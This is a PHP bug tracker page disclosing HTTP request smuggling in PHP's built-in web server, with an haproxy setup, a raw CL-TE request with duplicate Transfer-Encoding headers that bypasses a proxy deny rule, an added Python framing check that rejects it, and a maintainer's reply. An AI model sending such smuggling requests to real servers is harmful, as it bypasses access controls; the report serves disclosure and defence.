Bug #80043 HTTP Request Smuggling in php webserver
Submitted: 2020-09-01 07:09 UTC Modified: 2020-09-01 07:12 UTC
Votes:1
Avg. Score:5.0 ± 0.0
Reproduced:1 of 1 (100.0%)
Same Version:1 (100.0%)
Same OS:1 (100.0%)
From: kn0wns1c at gmail dot com Assigned:
Status: Open Package: Built-in web server
PHP Version: master-Git-2020-09-01 (Git) OS:
Private report: No CVE-ID: None

 [2020-09-01 07:09 UTC] kn0wns1c at gmail dot com
Description:
------------
The function php_http_parser_execute in sapi\cli\php_http_parser.c parses the HTTP request. When I send two Transfer-Encoding headers, one true and one false, in one HTTP request, it will think that it is a legal request. An attacker may use this feature to make an HTTP Request Smuggling attack.

For example, using haproxy to make a CL-TE attack:

haproxy version 1.5.3, haproxy.cfg
haproxy.cfg forbids access to the /flag URI

```
global
 daemon
 maxconn 256

defaults
 mode http
 timeout connect 5000ms
 timeout client 50000ms
 timeout server 50000ms

frontend http-in
 bind *:80
 default_backend servers
 acl url_403 path_beg -i /flag
 http-request deny if url_403

backend servers
 server server1 127.0.0.1:8080 maxconn 32

```
Run the PHP web server

```
php -S 127.0.0.1:8080
```

Using this HTTP request can bypass the haproxy /flag restriction

```
POST / HTTP/1.1
Host: 127.0.0.1
Transfer-Encoding: chunked
Transfer-Encoding: chunked-false
Content-Length: 50

1
A
0

GET /flag HTTP/1.1
Host: 127.0.0.1


```
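The request above carries two Transfer-Encoding fields, the second of which is not a registered transfer coding, together with a Content-Length; a server that honours the first field while the proxy in front of it discards the message framing it cannot parse is exactly what lets the second request slip through. The following is an added example, not code from the report or from PHP's own parser, showing the framing check a server-side parser should apply under RFC 7230 section 3.3.3: reject ambiguous framing rather than guess. The sample request heads are constructed from the report above.

```python
# Constructed sample inputs: the request head from the report above (body omitted)
# and a well-formed chunked request head for comparison.
SMUGGLED_HEAD = (
    "POST / HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "Transfer-Encoding: chunked\r\n"
    "Transfer-Encoding: chunked-false\r\n"
    "Content-Length: 50\r\n"
)
CLEAN_HEAD = "POST / HTTP/1.1\r\nHost: 127.0.0.1\r\nTransfer-Encoding: chunked\r\n"

# Transfer codings this server claims to understand; anything else is rejected.
KNOWN_CODINGS = {"chunked", "gzip", "deflate", "compress", "identity"}


def parse_headers(head):
    """Return (name, value) pairs from a raw request head, names lowercased."""
    pairs = []
    for line in head.split("\r\n")[1:]:  # skip the request line
        if line:
            name, _, value = line.partition(":")
            pairs.append((name.strip().lower(), value.strip()))
    return pairs


def framing_decision(head):
    """Decide body framing or reject it: ("chunked", None), ("content-length", n),
    ("none", None) or ("reject", reason). RFC 7230 s3.3.3: TE plus CL, an unknown
    coding, or a coding list not ending in chunked must be rejected, not guessed.
    """
    headers = parse_headers(head)
    te_values = [v for n, v in headers if n == "transfer-encoding"]
    cl_values = [v for n, v in headers if n == "content-length"]
    if te_values:
        # Repeated TE fields are equivalent to one comma-separated list.
        codings = [c.strip().lower() for v in te_values
                   for c in v.split(",") if c.strip()]
        unknown = [c for c in codings if c not in KNOWN_CODINGS]
        if unknown:
            return ("reject", "unknown transfer coding: " + ", ".join(unknown))
        if cl_values:
            return ("reject", "Transfer-Encoding and Content-Length both present")
        if codings[-1] != "chunked":
            return ("reject", "final transfer coding is not chunked")
        return ("chunked", None)
    if cl_values:
        if len(set(cl_values)) != 1 or not cl_values[0].isdigit():
            return ("reject", "conflicting or malformed Content-Length")
        return ("content-length", int(cl_values[0]))
    return ("none", None)
```

With this check the report's request is answered with 400 at the server, so the proxy and the server never disagree about where the first message ends.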


History

 [2020-09-01 07:12 UTC] stas@php.net
-Type: Security +Type: Bug
 [2020-09-01 07:12 UTC] stas@php.net
PHP CLI server is a debug feature and as such bugs in it are not security issues. See https://www.php.net/manual/en/features.commandline.webserver.php
 
PHP Copyright © 2001-2020 The PHP Group
All rights reserved.
Last updated: Mon Nov 23 17:01:23 2020 UTC